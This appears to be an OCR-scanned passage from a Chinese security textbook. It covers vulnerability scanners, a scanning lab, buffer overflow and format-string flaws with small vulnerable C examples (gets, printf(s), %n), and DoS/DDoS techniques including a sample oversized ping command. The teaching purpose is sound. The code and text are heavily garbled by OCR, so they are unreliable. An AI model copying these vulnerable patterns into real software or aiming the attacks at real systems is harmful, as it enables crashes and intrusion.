POP3/FTP 主机 进行 检测 ,对 系统 常见 漏洞 进行 扫描 。 
可 对 500 个 线程 探测 ,进行 线程 超时 设置 ,阻塞 线程 具 
有 自杀 功能 ,不 会 影响 其 他 线程 。 支 持 10 个 字典 同时 
检测 ,检测 设置 可 作为 项 目 保存 等 功能 。 流 光 不 但 是 人 
侵 者 的 利器 ,而且 还 是 管理 员 必 备 的 检测 系统 安全 的 安 
全 工具 。 

流光 运行 在 Windows 平台 上 ,其 主 界面 如 图 4. 25 
所 示 。 


图 4.25 “流光 ” 主 界面 


实验 14 系统 扫描 


1. 实验 目的 


(1) 了 解 扫描 攻击 的 基本 原理 ; 
(2) 掌握 常用 扫描 工具 的 基本 用 法 ; 
(3) 学 习 扫 描 器 程序 设计 的 基本 方法 。 


2. 实验 内 容 


(1) 使 用 两 种 扫描 器 软件 进行 扫描 ,包括 SATAN ,流光 、CIS、SuperScan 等 。 对 扫描 结 
果 进 行 统计 分 析 , 并 提出 被 扫描 系统 的 安全 改进 方案 。 

(2) 比较 两 种 扫描 器 的 功能 、 特 点 和 效果 。 

(3) 演示 自己 设计 的 端口 或 漏洞 扫描 程序 ,并 记录 演示 的 扫描 过 程 及 结果 。 

(4) 建立 漏洞 库 。 

(5) 运行 自己 设计 的 、 基 于 漏洞 库 的 、 高 效率 的 扫描 软件 ,用 它 进行 端口 和 漏洞 扫描 ,并 
进行 主机 脆弱 性 分 析 。 


3. 实验 准备 


(1) 设计 实验 的 环境 。 
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(2) 比较 几 种 常用 扫描 器 , 选 定 1 一 2 种 实用 扫描 器 。 

(3) 设计 使 用 扫描 器 的 步骤 。 

(4) 设计 漏洞 库 建立 的 方法 和 步骤。 

(5) 设计 一 个 可 以 演示 扫描 过 程 和 结果 的 扫描 器 程序 。 

(6) 设计 一 个 基于 漏洞 库 设 计 并 实现 一 个 高 效率 的 扫描 软件 ,可 以 进行 端口 和 漏洞 扫 
描 , 并 可 以 进行 主机 脆弱 性 分 析 。 


4. 推荐 的 分 析 讨 论 内 容 


(1) 分 析 网 络 扫描 器 在 网 络 管理 和 网 络 安全 方面 的 作用 。 
(2) 其 他 发 现 或 想到 的 问题 。 


4.7 代码 漏洞 攻击 


信息 系统 的 漏洞 是 普遍 存在 的 ,在 许多 方面 都 会 使 非 授 权 用 户 进入 系统 ,或 使 合法 用 户 
在 系统 中 进行 非法 操作 。 这 一 节 分 析 几 种 典型 的 代码 漏洞 。 


4.7.1 缓冲 区 溢出 攻击 


1. 缓冲 区 溢出 攻击 的 基本 原理 


缓冲 区 是 程序 运行 时 在 内 存 中 为 保存 给 定 类 型 的 数据 而 开辟 的 一 个 连续 空间 。 这 个 空 
间 是 有 限 的 。 当 程序 运行 过 程 中 要 放 入 缓冲 区 的 数据 太 多 时 ,就 会 产生 缓冲 区 溢出 。 

常见 的 缓冲 区 溢出 来 自 C 语 言 ( 以 及 其 后 代 C++ ) 本 质 的 不 安全 性 : 

。 没有 边界 来 检查 数组 和 指针 的 引用 ; 

。 标 准 C 库 中 还 存在 许多 非 安全 字符 串 操作 ,如 strcpy() 、sprintf() 、gets() 等 。 

为 了 说 明 这 个 问题 还 必须 看 一 看 程序 的 内 存 映像 。 

任何 一 个 源 程序 通常 都 包括 代码 段 和 数据 段 , 这 些 代 码 和 数据 本 身 都 是 静态 的 。 为 了 
运行 程序 ,首先 要 由 操作 系统 负责 为 其 创建 进程 ,并 在 进程 的 虚拟 地 址 空间 中 为 其 代码 段 和 
数据 段 建立 映射 。 但 是 ,只 有 静态 的 代码 段 和 数据 段 是 不 够 的 ,进程 在 运行 过 程 中 还 要 有 其 
动态 环境 。 一 般 来 说 ,默认 的 动态 存储 环境 通过 堆栈 (简称 栈 ) 机 制 建立 。 

从 逻辑 上 讲 , 进 程 的 堆栈 是 由 多 个 堆栈 帧 构成 的 .其 中 每 个 堆栈 帧 都 对 应 一 个 函数 调 
用 。 当 函数 调用 发 生 时 ,新 的 堆栈 帧 被 压 人 堆栈 ; 当 函 数 返 回 时 ,相应 的 堆栈 帧 从 堆栈 中 弹 
出 。 尽 管 堆栈 帧 结构 的 引入 为 在 高 级 语言 中 实现 函数 或 过 程 这 样 的 概念 提供 了 直接 的 硬件 
支持 ,但 是 由 于 将 函数 返回 地 址 这 样 的 重要 数据 保存 在 程序 员 可 见 的 堆栈 中 , 当 程序 写 入 超 
过 缓冲 区 的 边界 时 ,这 就 是 所 谓 的 “缓冲 区 溢出 ”。 

下 面 的 程序 是 一 个 缓冲 区 溢出 的 实例 。 

例 4.1 

#include 一 stdio. b> 

int main() 
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char name[5]; 

printf("Please input your name:”); 
gets(name); 

printf("you are %s",name); 


} 


运行 这 个 程序 可 以 发 现 , 当 输 入 的 字符 数 少时 ,程序 运行 正常 ; 当 输 入 的 字符 数 太 多 时 
(超过 8) ,程序 就 不 能 正常 结束 。 这 就 是 缓冲 区 溢出 所 造成 的 。 

当 发 生 数据 栈 溢出 时 ,多 余 的 内 容 就 会 越过 栈 底 , 履 盖 栈 底 后 面 的 内 容 。 通 常 , 与 栈 底 
相 邻 的 内 存 空间 中 存放 着 程序 返回 地 址 。 因 此 ,数据 栈 的 溢出 ,会 覆盖 程序 的 返回 地 址 ,从 
而 造成 如 下 局 面 : 要 么 程序 会 取 到 一 个 错误 地 址 ,要 么 将 因 程 序 无 权 访问 该 地 址 而 产生 一 
个 错误 。 


2. 缓冲 区 溢出 攻击 过 程 


如 果 当 发 生 缓冲 区 溢出 时 ,能 够 准确 地 控制 跳 转 地 址 ,将 程序 流程 引 向 预定 的 地 址 ， 
CPU 就 会 去 执行 这 个 指令 。 如 果 和 人 侵 者 在 预定 的 地 址 中 放置 代码 用 于 产生 一 个 shell, 则 
当 程 序 被 溢出 时 ,入 侵 者 将 获得 一 个 shell。 该 shell 会 继承 被 溢出 的 程序 的 权限 (操作 系统 
中 ,一 个 新 产生 的 shell 会 继承 生成 该 shell 的 程序 的 权限 ) 。 如 果 入 侵 者 获得 了 某 台 服务 器 
的 一 个 普通 权限 账号 ,而 服务 器 上 某 个 以 root 或 system 权限 运行 的 程序 存在 缓冲 区 溢出 
漏洞 ,入 侵 者 就 可 以 利用 该 漏洞 生成 的 shell 去 获得 root 权限 。 而 入 侵 者 进行 攻击 的 关键 
是 修改 以 较 高 权限 运行 的 程序 跳 转 指令 的 地 址 。 

入 侵 者 为 了 修改 以 较 高 权限 运行 的 程序 跳 转 指令 的 地 址 ,一般 要 经 过 如 下 3 步 。 

(1) 将 需要 执行 的 代码 放 到 目标 系统 的 内 存 。 下 面 是 两 种 常用 方法 : 

。 植 和 人 法: 通过 主机 ,将 需要 执行 的 代码 (目标 平台 上 可 执行 的 ) 直 接 放 到 缓冲 区 。 

。 利用 已 经 有 的 代码 修改 传人 参数 。 

(2) 修改 返回 地 址 。 

(3) 控制 程序 跳 转 ,改变 程序 流程 。 下 面 是 3 种 常用 方法 。 

。 修改 程序 返回 地 址 : 将 预先 设 定好 的 地 址 替换 程序 原来 的 返回 地 址 。 

。 在 缓冲 区 附近 放 一 个 函数 指针 ,指向 人 侵 者 定义 的 指令 。 

。 使 用 longjmp: C 语言 的 setjmp/longjmp 是 一 个 检验 /恢复 系统 ,可 以 在 检验 点 设 定 

setjmp(buffer) ,用 longjmp(buffer) 恢 复 检验 点 。 入 侵 者 可 以 利用 longjmp(buffer) 
跳 转 到 预定 代码 。 


3. 缓冲 区 溢出 防御 措施 


(1) 安装 安全 补丁 程序 。 
(2) 编写 安全 的 代码 : 缓冲 区 溢出 攻击 的 根源 在 于 编写 程序 的 机 制 。 因 此 ,防范 缓冲 
区 溢出 漏洞 首先 应 该 确保 在 Linux 系统 上 运行 的 程序 (包括 系统 软件 和 应 用 软件 ) 代 码 的 正 
确 性 ,避免 程序 中 有 不 检查 变量 .缓冲 区 大 小 及 边界 等 情况 存在 。 比 如 ,使 用 grep 工具 搜索 
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源 代码 中 容易 产生 漏洞 的 库 调用 ,检测 变量 的 大 小 、 数 组 的 边界 、 对 指针 变量 进行 保护 ,以 及 
使 用 具有 边界 、 大 小 检测 功能 的 C 编译 器 等 。 

(3) 基于 一 定 的 安全 策略 设置 系统 : 攻击 者 攻击 某 一 个 Linux 系统 ,必须 事先 通过 某 
些 途 径 对 要 攻击 的 系统 作 必 要 的 了 解 ,如 版 本 信息 等 ,然后 再 利用 系统 的 某 些 设置 直接 或 间 
接地 获取 控制 权 。 因 此 ,防范 缓冲 区 溢出 攻击 就 要 对 系统 设置 实施 有 效 的 安全 策略 。 


(4) 保护 堆栈 
。 加 入 函数 建立 和 销毁 代码 。 前 者 在 函数 返回 地 址 后 增加 一 些 附 加 字 节 ,返回 时 要 检 
查 这 些 字 节 有 无 被 改动 。 


。 使 堆栈 不 可 执行 一 一 非 执 行 缓冲 区 技术 ,使 入 侵 者 无 法 利用 缓冲 区 溢出 漏洞 。 
4.7.2 格式 化 字符 串 攻击 


格式 化 字符 串 攻 击 也 称 为 格式 化 字符 串 漏 洞 , 同 其 他 许多 安全 漏洞 一 样 是 由 于 程序 员 
的 玻 漏 造成 的 。 不 过 ,这 种 疏漏 来 自 程序 员 使 用 格式 化 字符 串 函 数 的 不 严谨 。 


1. 格式 化 字符 串 函数 族 


ANSI C 定义 了 一 系列 的 格式 化 字符 串 函 数 , 如 : 
。 printf: 输出 到 一 个 stdout 流 。 
。 fprintf: 输出 到 一 个 文件 流 。 
。 sprintf; 输出 到 字符 串 。 
。 snprintf; 输出 到 字符 串 并 检查 长 度 。 
。 vprintf; 从 va_arg 结构 体 输出 到 一 个 stdout 流 。 
。 vfprintf: 从 va_arg 结构 体 输出 到 一 个 文件 流 。 
。 vsprintf: 从 va_arg 结构 体 输出 到 一 个 字符 串 。 
vsnprintf: 从 va_arg 结构 体 输出 到 一 个 字符 串 并 检查 长 度 。 
基于 这 些 函 数 的 复杂 函数 和 非 标 准 函 数 ,包括 setproctitle、syslog、err x 、verr % 、 
warm、x vwarm 等 。 
这 些 函 数 有 一 个 共同 的 特点 ,就 是 都 要 使 用 一 个 格式 化 字符 串 。 例 如 对 于 大 家 熟悉 的 
printf 函数 , 它 的 前 一 个 参数 就 是 格式 化 字符 串 。 


2. 格式 化 字符 串 漏 洞 
为 了 说 明 对 格式 化 字符 串 使 用 不 当 而 产生 的 格式 化 字符 串 漏洞 ,请 先 看 下 面 的 程序 。 
例 4.2 


#include =stdio. bh> 
int main() 


{ 


char x name; 
gets(s); 
printf(s); 
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下 面 是 该 函数 的 两 次 运行 


abcde 
abcde% 08x, 中 08x, %08x 
000002e2 ,0000ffe4,0000011d 


也 就 是 说 , 当 输 入 abcde 时 ,输出 仍然 是 abcde。 而 当 输 入 %08x,%08x, %08x 时 ,输出 
的 却 是 000002e2,0000ffe4,0000011d。 这 就 是 格式 化 字符 串 漏洞 所 造成 的 问题 。 因 为 在 
printf 函数 中 ,s 被 解释 成 了 格式 化 字符 串 。 当 调用 该 函数 时 ,首先 会 解析 格式 化 字符 串 ,一 
次 取 一 个 字符 进行 分 析 : 如 果 字 符 不 是 %, 就 将 其 原样 输出 ;车 字符 是 %, 则 其 后 面 的 字符 
就 要 按照 格式 化 参数 进行 解析 。 当 输入 abcde 时 ,由 于 没有 包含 %, 所 以 每 个 字符 都 被 原样 
输出 了 。 而 当 输 入 %08x,%08x,%08x 时 ,就 要 将 每 个 % 后 面 的 x 都 解释 为 一 个 十 六 进 制 
的 数据 项 ,但 函数 没有 这 样 3 个 数据 项 。 于 是 ,就 将 堆栈 中 从 当前 堆栈 指针 向 堆栈 底部 方向 
的 3 个 地 址 的 内 容 按 十 六 进 制 输出 出 来 ,这 就 是 000002e2 ,0000ffe4 ,0000011d。 

这 就 给 人 们 一 个 启发 : 当 格 式 化 字符 串 中 包含 有 许多 % 时 ,就 会 有 机 会 访问 到 一 个 非 
法 地 址 。 


3. 格式 化 字符 串 攻 击 的 几 种 形式 


(1) 查看 内 存 堆栈 指针 开始 的 一 些 地 址 的 内 容 
由 例 4. 1 可 知 ,使 用 类 似 于 


printf ("%08x, %08x,%%08x); 


语句 ,可 以 输出 当前 堆栈 指针 指向 栈 底 方向 的 一 些 地 址 的 内 容 , 甚 至 可 以 是 超过 栈 底 之 外 
Re 

(2) 查看 内 存 任何 地 址 的 内 容 

所 查看 的 内 存 地 址 内 容 也 可 以 从 任何 一 个 地 址 开始 的 内 存 内 容 。 例 如 语句 


printf (\x20\02\x85\x08_%08x, %O8x, HO8Bx’); 


将 会 从 地 址 0x08850220 开始 ,查看 连续 3 个 地 址 的 内 容 。 
(3) 修改 内 存 任何 地 址 的 内 容 
格式 化 字符 串 函 数 还 可 以 使 用 一 个 格式 字符 %n。 它 的 作用 是 将 已 经 打印 的 字 节 数 写 
一 个 变量 。 请 观察 下 面 的 程序 。 
例 4.3 
#include 一 stdio. b> 
int main() 
{ 
int i; 
printf("china\ n\n”, Cint * ) &i); 
printf("i = %d\n ,iD; 


* /BE 及 


即 i 的 值 为 前 面 已 经 打印 的 字符 串 china 的 长 度 , 即 5。 利 用 这 一 点 ,很 容易 改变 某 个 
内 存 变 量 的 值 。 


例 4.4 
#include =stdio. h> 
int main() 
{ 
inti= 5; 


printf(" %108u%n\t ,1, Cint * )&i) ;print{("i= % d\n iD; 
printf("%58s123%n\t,”, &i) ;print("i= % d\n iD; 

} 

程序 执行 结果 如 下 : 


1 i=108 
123 i=26 
语句 
printf("%108u%n\t ,1, Cint * )&iD; 
用 数据 1 的 宽度 , 即 108 来 修改 变量 i 的 值 。 而 语句 


printf(”"%58s123%n\t",” ", Bi); 


是 用 字符 串 "" 加 上 字符 串 123 的 存放 宽度 , 即 23 十 3 来 修改 变量 i 的 值 。 
使 用 同样 的 办 法 可 以 向 进程 空间 中 的 任意 地 方 写 一 个 字 节 。 以 达到 下 面 的 目的 : 
。 通 过 修改 关键 内 存 地 址 内 容 实 现 对 程序 流程 的 控制 ; 
。 覆盖 一 个 程序 储存 的 UID 值 , 以 降低 和 提升 特权 ; 
。 窗 盖 一 个 执行 命令 ; 
。 禾 盖 一 个 返回 地 址 ,将 其 重 定向 到 包含 shell code 的 缓冲 区 中 。 


4.8 拒绝 服务 攻击 


严格 地 说 ,拒绝 服务 (denial of service， DoS) 攻 击 并 不 是 某 一 种 具体 的 攻击 方式 ,而 是 
攻击 所 表现 出 来 的 结果 ,最 终 使 得 目标 系统 因 遭 受 某 种 程度 的 破坏 而 不 能 继续 提供 正常 的 
服务 ,其 至 导致 物理 上 的 瘫痪 或 崩 演 。 具 体 的 攻击 方法 可 以 是 多 种 多 样 的 ,可 以 是 单一 的 手 
段 , 也 可 以 是 多 种 方式 的 组 合 利用 ,最 基本 的 DoS 攻击 就 是 利用 合理 的 服务 请 求 来 占用 过 
多 的 服务 资源 。 

按照 所 使 用 的 技术 ,拒绝 服务 大 体 上 可 以 分 为 两 大 类 : 
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(1) 基于 错误 配置 .系统 漏洞 或 软件 缺陷 ,如 : 

。 利用 传输 协议 缺陷 发 送 畸 形 数据 包 , 以 耗 尽 目标 主机 资源 ,使 之 无 法 提供 服务 。 

。 利用 主机 服务 程序 漏洞 发 送 特殊 格式 数据 ,导致 服务 处 理 出 错 而 无 法 提供 服务 。 

(2) 通过 攻击 合理 的 服务 请 求 ,消耗 系统 资源 ,使 服务 超载 ,无 法 响应 其 他 请 求 。 例 如 
制造 高 流量 数据 流 ,造成 网 络 拥塞 ,使 受害 主机 无 法 与 外 界 通信 。 

在 许多 情况 下 要 使 用 上 面 两 种 方法 的 组 合 。 例 如 ,利用 受害 主机 服务 缺陷 ,提交 大 量 请 
求 以 耗 尽 主机 资源 ,使 受害 主机 无 法 接受 新 请 求 。 


4.8.1 拒绝 服务 攻击 典型 举例 


1. 死亡 之 ping(ping of death) 


(1) ICMP 协议 及 其 缺陷 

IP 是 一 种 不 可 靠 .无 连接 的 包 传送 协议 ,也 是 一 种 尽 最 大 努力 服务 的 协议 。 当 一 个 包 
在 经 过 多 个 网 际 部 件 的 传送 途中 ,可 能 出 现 传送 方向 出 错 、 目 的 主机 不 响应 ` 包 拥塞 .不 能 出 
错 等 情况 。 这 时 ,由 于 它 没有 差错 报告 和 差错 纠正 机 制 ,所 以 将 无 能 为 力 。 为 了 弥补 IP 的 
这 些 不 足 , 在 IP 层 引 入 了 一 个 子 协 议 : 网 际 控制 消息 协议 ICMP(Internet control message 
protocol) 。 

ICMP 是 一 种 差错 报告 机 制 , 它 为 路 由 器 或 目标 主机 提供 了 一 种 方法 ,使 它们 能 把 遇 到 
的 差错 报告 给 源 主机 。 如 图 4. 26 所 示 ,ICMP 报 文 始终 包含 IP Te 
首部 和 产生 ICMP 差错 报 文 的 IP 数据 报 的 前 8 个 字 节 (64KB)。 1 
由 于 这 一 特点 ,早期 的 许多 操作 系统 在 处 理 ICMP 协议 (如 接收 ”由 首部 | 下 数据 
ICMP 数据 报 文 ) 时 ,只 开辟 64KB 的 缓存 区 。 在 这 种 情况 下 ,一 图 4.26 ICMP 分 组 的 封装 
旦 处 理 的 数据 报 的 实际 长 度 超过 64KB ,操作 系统 将 会 产生 一 个 
缓冲 区 溢出 ,引起 内 存 分 配 错误 ,最终 导致 TCP/IP 协议 堆栈 的 崩溃 ,造成 主机 死机 。 

(2) ping 程序 与 拒绝 服务 攻击 的 实现 

ping 是 TCP/IP 网 络 中 一 个 最 简单 而 又 非常 有 用 的 ICMP 应 用 程序 。 它 使 用 ICMP 回 
应 请 求 /应 答 ,测试 一 人 台 主 机 的 可 达 性 ,具体 可 以 用 于 下 列 场 合 : 

。 验证 基础 TCP/IP 软件 的 操作 ; 

。 验证 DNS 服务 器 的 操作 ; 

。 验证 一 个 网 络 或 网 络 中 的 设备 是 否 可 以 被 访问 。 

由 于 早期 的 ping 可 以 用 参数 -1 指定 所 发 送 数据 包 的 尺寸 ,有 可 能 发 送 一 个 超过 64KB 
的 报 文 。 如 


ping-1 65540 212. 15. 1. 0 
这 时 ,对方 的 主机 存在 这 种 漏洞 ,就 会 形成 一 次 拒绝 服务 攻击 。 


需要 说 明 的 是 ,现在 的 操作 系统 所 附带 的 ping 程序 都 限制 了 发 送 数据 包 的 大 小 。 因 而 
这 样 的 攻击 已 经 不 再 可 能 。 
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2.“ 泪 滴 ”(teardrop) 


“ 泪 滴 ”也 称 为 分 片 攻 击 。 这 是 一 个 利用 TCP/IP 的 缺陷 进行 拒绝 服务 攻击 的 典型 。 

(1) TCP 数据 分 片 

当 两 台 计 算 机 通信 时 ,车 数 据 量 太 大 ,无 法 在 一 个 数据 报 文中 进行 传输 ,就 会 由 TCP 将 
数据 拆 分 成 多 个 分 片 , 传 送 到 目的 地 后 再 到 堆栈 中 进行 重组 。 由 于 各 片 是 分 别传 输 的 ,并 且 
所 经 过 的 路 径 和 传输 的 速度 各 不 相同 ,为 了 组 装 , 在 IP 包 的 首部 中 必须 含有 本 片 数据 是 原 
数据 中 的 那 一 段 的 信息 。 下 面 是 将 一 个 数据 分 成 3 片 ,并 要 尽快 地 将 数据 送 往 接收 进程 
(PSH): 

PSH 1: 1024(1024) ackl, win4096 


PSH 1025: 2048(1024) ackl, win4096 
PSH 2049: 3072(1024) ackl, win4096 


如 图 4. 27 为 数据 的 分 片 ,传输 和 重 装 过 程 示意 图 。 


PSH 1:1024…，|PSH 1025:2048…|PSH 2049:3072… 发 送 端 


PSH 2049:3072… 
1 


网 络 
PSH 1025:2048… 
PSH 1:1024… 
接收 端 
PSH 1:1024… |PSH 1025:2048…|PSH 2049:3072… 


图 4.27 TCP 数 据 的 分 片 , 传 输 和 重 装 过 程 示意 图 


(2)“ 泪 滴 ” 攻 击 

“ 泪 滴 ”攻击 就 是 入 侵 者 伪造 数据 报 文 ,向 目标 机 发 送 含有 重 释 偏 移 的 畸形 数据 分 片 。 
如 图 4. 28 所 示 。 当 这 样 的 畸形 分 片 传送 到 目的 主机 后 ,在 堆栈 中 重组 时 就 会 导致 重组 出 
错 , 引 起 协议 栈 的 崩溃 。 


入 侵 者 
PSH 2049:3072… 
1 1 
PSH 二 
PSH 1:1024-…- 
1 1 
重 装 出 错 目标 主机 


图 4.28 含有 重合 偏 移 的 畸形 数据 分 片 


3. UDP"* 洪 水 ”(UDP flood) 


UDP 洪水 ?由 ECHO/CHARGEN 服务 引起 。ECHO/CHARGEN 服务 是 TCP/IP 为 
TCP 和 UDP 提供 的 一 种 服务 。ECHO 的 作用 就 是 由 接收 端 将 接收 到 的 数据 内 容 返 回 到 发 
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送 端 ,CHARGEN 则 随机 返回 字符 。 这 样 简单 的 功能 为 网 络 管理 员 提 供 了 进行 可 达 性 测 
试 ,协议 软件 测试 和 选 路 识别 的 重要 工具 ,也 为 黑客 进行 “洪水 ?攻击 提供 了 方便 。 当 和 人 侵 者 
假冒 一 台 主 机 向 另 一 台 主 机 的 服务 端口 发 送 数据 时 ,ECHO 服务 或 CHARGEN 服务 就 会 
自动 回复 。 两 台 机 器 之 间 的 互相 回 送 , 会 形成 大 量 数据 包 。 当 多 台 主 机 之 间 相 互 产生 回 送 
数据 包 时 ,最 终 会 导致 系统 瘫痪 。 


4. SYN"* 洪 水 ”(SYN flood) 与 Land 


这 是 两 个 利用 TCP 连接 中 三 次 握手 过 程 的 缺陷 的 拒绝 服务 攻击 。 正 常 的 TCP 握手 需 
要 三 次 包 交 换 来 建立 。 一 台 服 务 器 一 旦 接收 到 客户 机 的 SYN 包 后 必须 回应 一 个 SYN/ 
ACK 包 , 然 后 等 待 该 客户 机 回应 给 它 一 个 ACK 包 确 认 , 才 真正 建立 连接 。 

SYN "洪水 ”的 攻击 方法 是 攻击 者 用 伪造 的 地 址 (网 上 没有 使 用 的 地 址 ?向 目标 主机 发 
出 大 量 初始 化 的 SYN 包 。 目 标 主 机 收 到 请 求 后 ,分 别 回 以 相应 的 SYNVACK。 但 是 由 于 源 
地 址 是 虚假 的 ,所 以 目标 主机 会 因为 其 SYN/ACK 得 不 到 确认 ,会 保持 相应 的 连接 直到 超 
时 。 当 这 些 未 释放 的 连接 请 求 超过 一 定 限度 时 ,就 会 拒绝 新 的 连接 请 求 。 

Land 也 是 利用 三 次 握手 的 缺陷 进行 攻击 。 但 它 不 是 依靠 伪造 的 地 址 ,而 是 先 发 出 一 个 
特殊 的 SYN 数据 包 , 包 中 的 源 地 址 和 目标 地 址 都 是 目标 主机 。 这 样 ,就 会 让 目标 主机 向 自 
己 回 以 SYN/ACK 包 , 导 致 自己 又 给 自己 回 一 个 ACK 并 建立 自己 与 自己 的 连接 。 大 量 这 
样 的 无 效 连接 达到 一 定数 量 , 将 会 拒绝 新 的 连接 请 求 。 


5. MAC 地 址 攻击 


这 里 介绍 的 MAC 地 址 攻击 是 针对 交换 机 的 攻击 。 在 交换 式 局 域 网 中 ,交换 机 利用 交 
换 地 址 映射 表 将 从 一 个 端口 (MAC) 接 收 到 的 数据 转发 到 另外 的 端口 (MAC)。 动 态 的 交换 
地 址 映射 表 要 在 AGE TIME 后 进行 更 新 。 如 果 某 一 端口 一 直 没 有 收 到 来 自 某 一 MAC 地 
址 的 数据 包 , 则 在 交换 地 址 映射 表 就 没有 了 它们 的 映射 关系 。 而 若 再 收 到 目的 地 址 为 该 
MAC 地 址 的 数据 包 时 ,交换 机 就 会 用 洪 泛 算法 进行 转发 处 理 。 这 对 交换 机 的 性 能 会 造成 
影响 。 

假如 攻击 者 生成 大 量 源 地 址 各 不 相同 的 数据 包 , 这 些 MAC 地 址 就 会 充满 交换 机 的 交 
换 地 址 映射 表 空 间 , 则 正常 的 数据 包 到 达 时 都 被 洪 泛 出 去 ,致使 交换 机 的 查 表 速 度 严 重 下 
降 ,不 能 继续 工作 。 


4.8.2 分 布 式 拒绝 服务 攻击 


分 布 式 拒 绝 服务 (distributed denial of service,DDoS) 攻 击 指 借助 于 客户 /服务 器 技术 ， 
将 多 个 计算 机 联合 起 来 作为 攻击 平台 ,对 一 个 或 多 个 目标 发 动 DoS 攻击 ,从 而 成 倍 地 提高 
拒绝 服务 攻击 的 威力 。 通 常 ,攻击 者 使 用 一 个 偷窃 账号 将 DDoS 主 控 程 序 安 装 在 一 个 计算 
机 上 , 主 控 程 序 在 一 个 设 定 的 时 间 将 与 大 量 代 理 程 序 通 信 , 代 理 程序 已 经 安装 在 Internet 上 
的 许多 计算 机 上 。 代 理 程序 收 到 指令 时 就 发 动 攻击 。 利 用 客户 /服务 器 技术 , 主 控 程 序 能 在 
几 秒 钟 内 激活 成 百 上 千 次 代理 程序 的 运行 。 
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1.DDos 攻击 原理 


为 了 便于 读者 理解 ,下 面 结 合 几 个 DDoS 实例 介绍 DDoS 攻击 原理 。 

(1) Smurf 与 Fraggle 

将 一 个 目的 地 址 设置 成 广播 地 址 (以 太 网 地 址 为 FF: FF: FF: FF: FF: FF: FF) 后 ， 
将 会 被 网 络 中 所 有 主机 接收 并 人 处理。 显然 ,如 果 攻 击 者 假冒 目标 主机 的 地 址 发 出 广播 信息 ， 
则 所 有 主机 都 会 向 目标 主机 回复 一 个 应 答 使 目标 主机 淹没 在 大 量 信息 中 ,无 法 提供 新 的 服 
务 。 这 两 个 攻击 就 是 利用 广播 地 址 的 这 一 特点 将 攻击 放大 而 实施 的 拒绝 服务 攻击 。 其 中 ， 
Smurf 是 用 广播 地 址 发 送 ICMP ECHO 包 ,而 Fraggle 是 用 广播 地 址 发 送 UDP 包 。 

显然 ,Smurf 为 了 能 工作 ,必须 要 找到 攻击 平台 ,这 个 平台 就 是 : 其 路 由 器 上 启动 了 IP 
广播 功能 一 一 允许 Smurf 发 送 一 个 伪造 的 ping 信息 包 , 然 后 将 它 传播 到 整个 计算 机 网 络 
中 。 另 一 方面 ,为 防止 系统 成 为 Smurf 攻击 的 平台 ,要 将 所 有 路 由 器 上 IP 的 广播 功能 都 禁 
止 (一 般 来 讲 ,IP 广播 功能 并 不 需要 )。 但 是 ,攻击 者 若 从 LAN 内 部 发 动 一 个 Smurf 攻击 ， 
在 这 种 情况 下 ,禁止 路 由 器 上 的 IP 广播 功能 就 没有 用 了 。 为 了 避免 这 样 一 个 攻击 ,许多 操 
作 系 统 都 提供 了 相应 设置 ,防止 计算 机 对 IP 广播 请 求 做 出 响应 。 

挫败 一 个 Smurf 攻击 的 最 简单 方法 是 对 边界 路 由 器 的 回音 应 答 (echo reply) 信 息 包 进 
行 过 滤 ,然后 丢弃 它们 ,使 网 络 避 免 被 淹没 。 

(2) trinoo 

trinoo 是 复杂 的 DDoS 攻击 程序 , 它 使 用 了 前 面 介绍 过 的 主 控 程序 master 对 实际 实施 
攻击 的 任何 数量 的 “代理 ”程序 实现 自动 控制 。 图 4. 29 形象 地 表明 了 它 的 攻击 原理 。 图 中 
的 “人 牧 仿 机 ”就 是 一 些 * 代 理 ”, “控制 侈 偏 机 ”就 是 安装 有 master 程序 的 计算 机 。 该 图 对 介绍 
DDoS 更 具有 一 般 性 。 


攻击 俐 儒 机 


攻击 仇 俐 机 


攻击 俐 偶 机 


图 4. 29 DDoS 的 一 般 原 理 
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一 个 比较 完善 的 DDoS 攻击 体系 分 成 4 部 分 : 

。 攻击 者 所 在 机 ; 

。 控制 机 (用 来 控制 侧 偶 机 )， 

。 倪 偶 机 ; 

“受害 者 。 

对 受害 者 的 攻击 是 从 仇 仿 机 上 发 出 的 ,控制 机 只 发 布 命令 而 不 参与 实际 的 攻击 。 

trinoo DDoS 攻击 的 基本 过 程 是 : 攻击 者 连接 到 安装 了 master 程序 的 计算 机 ,启动 
master 程序 ,然后 根据 一 个 IP 地 址 的 列表 ,由 master 程序 负责 启动 所 有 的 代理 程序 。 接 
着 ,代理 程序 用 UDP 信息 包 冲 击 网 络 ,攻击 目标 。 在 攻击 之 前 ,侵入 者 为 了 安装 软件 ,已 经 
控制 了 装 有 master 程序 的 计算 机 和 所 有 装 有 代理 程序 的 计算 机 。 

DDoS 就 是 利用 更 多 的 佛 偶 机 发 起 进攻 ,以 更 大 的 规模 进攻 受害 者 。 

(3) Tribal Flood Network 和 TFN2K 

Tribe Flood Network 与 trinoo 一 样 ,使 用 一 个 master 程序 与 位 于 多 个 网 络 上 的 攻击 
代理 进行 通信 。TFN 可 以 并 行 发 动 数不胜数 的 DoS 攻击 ,类 型 多 种 多 样 ( 如 UDP 攻击 、 
TCP SYN 攻击 ICMP 回音 请 求 攻击 以 及 ICMP 广播 ) ,而 且 还 可 建立 带 有 伪装 源 IP 地 址 
的 信息 包 。 

TFN2K 是 TFN 的 一 个 更 高 级 的 版 本 , 它 “ 修 复 ” 了 TFN 的 某 些 缺点 。 

(4) Stacheldraht 

Stacheldraht 也 是 基于 TFN 的 , 它 采 用 和 trinoo 一 样 的 客户 机 /服务 器 模式 ,其 中 mas- 
ter 程序 与 潜在 的 成 千 个 代理 程序 进行 通信 。 在 发 动 攻击 时 ,侵入 者 与 master 程序 进行 连 
接 。Stacheldraht 增加 了 以 下 新 功能 : 攻击 者 与 master 程序 之 间 的 通信 是 加 密 的 ,以 及 使 
用 rcp (remote copy, 远 程 复制 ) 技 术 对 代理 程序 进行 更 新 。 


2. DDoS 系统 的 一 般 结构 


在 更 一 般 的 情况 下 ,DDoS 可 能 使 用 多 台 控 制 机 ,形成 图 4. 30 所 示 的 结构 。 
|] 代理 端 


主 控 端 


攻击 者 主 控 端 导 一 受害 者 
NN 
| 


图 4.30 DDoS 攻击 原理 
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组 织 一 次 DDoSs 攻击 的 过 程 


这 里 用 “组 织 ” 这 个 词 , 是 因为 DDoS 并 不 像 入 侵 一 台 主 机 那样 简单 。 一 般 来 说 ,黑客 进 
行 DDoS 攻击 时 会 经 过 如 下 几 个 步骤 . 

(1) 搜集 了 解 目 标的 情况 

下 列 情况 是 黑客 非常 关心 的 情报 : 

。 被 攻击 目标 主机 数目 、 地 址 情况 ; 


